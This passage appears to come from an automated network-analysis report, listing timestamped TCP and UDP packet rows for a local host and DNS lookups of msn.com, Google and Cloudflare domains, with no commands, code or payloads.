                                May 27, 2024 08:44:54.925784111 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.926371098 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.973660946 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.974325895 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.219505072 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.219618082 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.224617004 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.224684000 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.273708105 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.273797035 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.300549030 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.300894022 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306056023 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306123972 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306525946 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306554079 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306580067 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306587934 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306622028 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306649923 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306660891 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306710958 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306725025 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306746960 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306821108 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306854010 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.307204008 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.310887098 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.310935020 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.310961962 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.311175108 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.311512947 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.311754942 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.353749990 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.390783072 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.390974998 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:45:14.387442112 CEST4985380192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.392482996 CEST804985318.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.393273115 CEST4985380192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.403891087 CEST4985380192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.409089088 CEST804985318.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.907557011 CEST4985380192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.907557011 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.912640095 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.913252115 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.918200970 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.923454046 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923469067 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923506975 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923521996 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923528910 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923602104 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923655987 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.923719883 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.923753023 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923780918 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923808098 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923827887 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.924689054 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.928445101 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.928606987 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.928747892 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.928991079 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.928997993 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.929099083 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.929125071 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.929130077 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.929197073 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.929238081 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.929245949 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.929296970 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.929641962 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.954176903 CEST804985318.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.970074892 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.970844984 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.017688036 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.017893076 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.065747976 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.065951109 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.113739014 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.113806009 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.161822081 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.161885023 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.209796906 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.209853888 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.257895947 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.257980108 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.305854082 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.305965900 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.353873968 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.353950024 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.401804924 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.401932001 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.453835964 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.453907013 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.501852036 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.501914978 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.549813986 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.549876928 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.597886086 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.597961903 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.646137953 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.646204948 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.694880009 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.695017099 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.751883030 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.751944065 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.797703981 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.797775030 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.849637985 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.849704981 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.897671938 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.897737026 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.949605942 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.949666023 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.001723051 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.001792908 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.049835920 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.057282925 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.105731964 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.105880022 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.153933048 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.161446095 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.209701061 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.217363119 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.265794992 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.270551920 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.321851969 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.322029114 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.373713017 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.378107071 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.429951906 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.430409908 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.494441032 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.494698048 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.549859047 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.550256968 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.597999096 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.598239899 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.645984888 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.646117926 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.693898916 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.694003105 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.745990038 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.746182919 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.794008017 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.794162989 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.842062950 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.843242884 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.889898062 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.891639948 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.937786102 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.943185091 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:16.989861965 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:16.995254040 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.042047977 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.042222023 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.089863062 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.089937925 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.137968063 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.138161898 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.185762882 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.185933113 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.233870029 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.234055996 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.281830072 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.281913042 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.334008932 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.334188938 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.381957054 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.382071972 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.429856062 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.429923058 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.477981091 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.478075027 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.525743961 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.525821924 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.573802948 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.573982954 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.621700048 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.621799946 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.673665047 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.673764944 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.721884966 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.722094059 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.769763947 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.769979954 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.817796946 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.817889929 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.869756937 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.869822979 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.921854973 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:17.921941996 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:17.969906092 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:35.776113033 CEST804985318.143.129.199192.168.2.4
                                May 27, 2024 08:45:35.776846886 CEST4985380192.168.2.418.143.129.199
                                May 27, 2024 08:45:36.286056995 CEST804985418.143.129.199192.168.2.4

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                May 27, 2024 08:42:38.382693052 CEST5927253192.168.2.41.1.1.1
                                May 27, 2024 08:42:39.687733889 CEST6169653192.168.2.41.1.1.1
                                May 27, 2024 08:42:39.687969923 CEST5494653192.168.2.41.1.1.1
                                May 27, 2024 08:42:39.694967985 CEST53616961.1.1.1192.168.2.4
                                May 27, 2024 08:42:39.695409060 CEST53549461.1.1.1192.168.2.4
                                May 27, 2024 08:42:39.917555094 CEST5285653192.168.2.41.1.1.1
                                May 27, 2024 08:42:39.918190002 CEST6481653192.168.2.41.1.1.1
                                May 27, 2024 08:42:39.918842077 CEST5414653192.168.2.41.1.1.1
                                May 27, 2024 08:42:39.918992996 CEST6380953192.168.2.41.1.1.1
                                May 27, 2024 08:42:39.924588919 CEST53528561.1.1.1192.168.2.4
                                May 27, 2024 08:42:39.924998045 CEST53648161.1.1.1192.168.2.4
                                May 27, 2024 08:42:39.925837994 CEST53541461.1.1.1192.168.2.4
                                May 27, 2024 08:42:39.926471949 CEST53638091.1.1.1192.168.2.4
                                May 27, 2024 08:42:40.250313997 CEST5490353192.168.2.41.1.1.1
                                May 27, 2024 08:42:40.250457048 CEST6119753192.168.2.41.1.1.1
                                May 27, 2024 08:42:40.257168055 CEST53549031.1.1.1192.168.2.4
                                May 27, 2024 08:42:40.257539034 CEST53611971.1.1.1192.168.2.4
                                May 27, 2024 08:42:41.030694962 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.353544950 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.482713938 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.482784986 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.482837915 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.482872009 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.482906103 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.483469963 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.486124039 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.486498117 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.486773968 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.487251043 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.487251043 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.583865881 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.584017992 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.584336996 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.584350109 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.587330103 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.596508980 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.596746922 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.602493048 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.605521917 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:41.691435099 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:41.937823057 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:42.045712948 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:42.463268995 CEST6049053192.168.2.41.1.1.1
                                May 27, 2024 08:42:42.470218897 CEST53604901.1.1.1192.168.2.4
                                May 27, 2024 08:42:42.491705894 CEST5694553192.168.2.41.1.1.1
                                May 27, 2024 08:42:42.523696899 CEST5590553192.168.2.41.1.1.1
                                May 27, 2024 08:42:42.770735025 CEST6182253192.168.2.41.1.1.1
                                May 27, 2024 08:42:43.818285942 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.126435995 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.279025078 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.279047966 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.280064106 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.281236887 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.281253099 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.281267881 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.320982933 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.333144903 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.333144903 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.334304094 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.334992886 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.335170031 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.427434921 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.427556992 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.427584887 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.427615881 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.427844048 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.429979086 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.430386066 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.431310892 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.504014015 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.504014015 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.504775047 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.598241091 CEST44354856162.159.61.3192.168.2.4
                                May 27, 2024 08:42:44.626358032 CEST54856443192.168.2.4162.159.61.3
                                May 27, 2024 08:42:44.816612959 CEST6225153192.168.2.41.1.1.1
                                May 27, 2024 08:42:44.824348927 CEST53622511.1.1.1192.168.2.4
                                May 27, 2024 08:42:44.998958111 CEST5455653192.168.2.41.1.1.1
                                May 27, 2024 08:42:45.071733952 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:45.071831942 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:45.167799950 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:45.168803930 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:45.168838024 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:45.169131041 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:46.293409109 CEST5066753192.168.2.41.1.1.1
                                May 27, 2024 08:42:46.342869997 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:46.342968941 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:46.438548088 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:46.440853119 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:46.440886021 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:46.441173077 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:48.873825073 CEST5305253192.168.2.41.1.1.1
                                May 27, 2024 08:42:48.880688906 CEST53530521.1.1.1192.168.2.4
                                May 27, 2024 08:42:49.695084095 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:49.695549965 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:42:49.791013002 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:49.791439056 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:49.791562080 CEST44355280172.64.41.3192.168.2.4
                                May 27, 2024 08:42:49.792453051 CEST55280443192.168.2.4172.64.41.3
                                May 27, 2024 08:43:11.054940939 CEST6480753192.168.2.41.1.1.1
                                May 27, 2024 08:43:11.093226910 CEST53648071.1.1.1192.168.2.4
                                May 27, 2024 08:43:31.517122030 CEST5734253192.168.2.41.1.1.1
                                May 27, 2024 08:43:31.849898100 CEST53573421.1.1.1192.168.2.4
                                May 27, 2024 08:43:46.376377106 CEST4962553192.168.2.41.1.1.1
                                May 27, 2024 08:43:46.726468086 CEST53496251.1.1.1192.168.2.4
                                May 27, 2024 08:43:51.811026096 CEST5183153192.168.2.41.1.1.1
                                May 27, 2024 08:43:51.820311069 CEST53518311.1.1.1192.168.2.4
                                May 27, 2024 08:44:12.443506002 CEST5114153192.168.2.41.1.1.1
                                May 27, 2024 08:44:12.479780912 CEST53511411.1.1.1192.168.2.4
                                May 27, 2024 08:44:33.137213945 CEST6389453192.168.2.41.1.1.1
                                May 27, 2024 08:44:33.147129059 CEST53638941.1.1.1192.168.2.4
                                May 27, 2024 08:44:53.668488026 CEST5610053192.168.2.41.1.1.1
                                May 27, 2024 08:44:54.343941927 CEST53561001.1.1.1192.168.2.4
                                May 27, 2024 08:45:14.201545000 CEST6382153192.168.2.41.1.1.1
                                May 27, 2024 08:45:14.386409998 CEST53638211.1.1.1192.168.2.4
                                May 27, 2024 08:45:28.313114882 CEST6055653192.168.2.41.1.1.1
                                May 27, 2024 08:45:28.667540073 CEST53605561.1.1.1192.168.2.4
                                May 27, 2024 08:45:34.774508953 CEST5056853192.168.2.41.1.1.1
                                May 27, 2024 08:45:34.810862064 CEST53505681.1.1.1192.168.2.4
                                May 27, 2024 08:45:55.303036928 CEST5036853192.168.2.41.1.1.1
                                May 27, 2024 08:45:55.355439901 CEST53503681.1.1.1192.168.2.4
                                May 27, 2024 08:45:56.698385000 CEST5903053192.168.2.41.1.1.1
                                May 27, 2024 08:45:56.698710918 CEST5835453192.168.2.41.1.1.1
                                May 27, 2024 08:45:56.705454111 CEST53583541.1.1.1192.168.2.4
                                May 27, 2024 08:45:56.705581903 CEST53590301.1.1.1192.168.2.4
                                May 27, 2024 08:45:56.707305908 CEST64102443192.168.2.4162.159.61.3
                                May 27, 2024 08:45:56.707643032 CEST64102443192.168.2.4162.159.61.3
                                May 27, 2024 08:45:56.708327055 CEST64102443192.168.2.4162.159.61.3
                                May 27, 2024 08:45:56.708585024 CEST64102443192.168.2.4162.159.61.3
                                May 27, 2024 08:45:57.174698114 CEST44364102162.159.61.3192.168.2.4
                                May 27, 2024 08:45:57.183423996 CEST64102443192.168.2.4162.159.61.3
                                May 27, 2024 08:45:57.206427097 CEST64102443192.168.2.4162.159.61.3
                                May 27, 2024 08:45:57.285641909 CEST44364102162.159.61.3192.168.2.4
                                May 27, 2024 08:45:57.285734892 CEST44364102162.159.61.3192.168.2.4
                                May 27, 2024 08:45:57.285769939 CEST44364102162.159.61.3192.168.2.4
                                May 27, 2024 08:45:57.285798073 CEST44364102162.159.61.3192.168.2.4
                                May 27, 2024 08:45:57.286308050 CEST64102443192.168.2.4162.159.61.3
                                May 27, 2024 08:45:57.286551952 CEST64102443192.168.2.4162.159.61.3
                                May 27, 2024 08:45:57.388303995 CEST44364102162.159.61.3192.168.2.4
                                May 27, 2024 08:45:57.390750885 CEST64102443192.168.2.4162.159.61.3
                                May 27, 2024 08:45:57.493715048 CEST44364102162.159.61.3192.168.2.4
                                May 27, 2024 08:45:57.494096994 CEST44364102162.159.61.3192.168.2.4
                                May 27, 2024 08:45:57.494335890 CEST44364102162.159.61.3192.168.2.4
                                May 27, 2024 08:45:57.497714043 CEST64102443192.168.2.4162.159.61.3
                                May 27, 2024 08:46:17.548501968 CEST5467553192.168.2.41.1.1.1
                                May 27, 2024 08:46:18.550698996 CEST5467553192.168.2.41.1.1.1
                                May 27, 2024 08:46:18.699352026 CEST53546751.1.1.1192.168.2.4
                                May 27, 2024 08:46:18.699374914 CEST53546751.1.1.1192.168.2.4
                                May 27, 2024 08:46:38.771209002 CEST5231453192.168.2.41.1.1.1
                                May 27, 2024 08:46:38.957050085 CEST53523141.1.1.1192.168.2.4

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                May 27, 2024 08:42:38.382693052 CEST192.168.2.41.1.1.10xc66bStandard query (0)www.msn.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:39.687733889 CEST192.168.2.41.1.1.10x2947Standard query (0)clients2.googleusercontent.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:39.687969923 CEST192.168.2.41.1.1.10xe891Standard query (0)clients2.googleusercontent.com65IN (0x0001)false
                                May 27, 2024 08:42:39.917555094 CEST192.168.2.41.1.1.10xfc59Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:39.918190002 CEST192.168.2.41.1.1.10x12f5Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                May 27, 2024 08:42:39.918842077 CEST192.168.2.41.1.1.10xf929Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:39.918992996 CEST192.168.2.41.1.1.10xe1b9Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                May 27, 2024 08:42:40.250313997 CEST192.168.2.41.1.1.10xfd5bStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:40.250457048 CEST192.168.2.41.1.1.10xf222Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                May 27, 2024 08:42:42.463268995 CEST192.168.2.41.1.1.10x9d5Standard query (0)sb.scorecardresearch.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:42.491705894 CEST192.168.2.41.1.1.10x2f89Standard query (0)api.msn.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:42.523696899 CEST192.168.2.41.1.1.10x3fbcStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:42.770735025 CEST192.168.2.41.1.1.10x556bStandard query (0)c.msn.comA (IP address)IN (0x0001)false
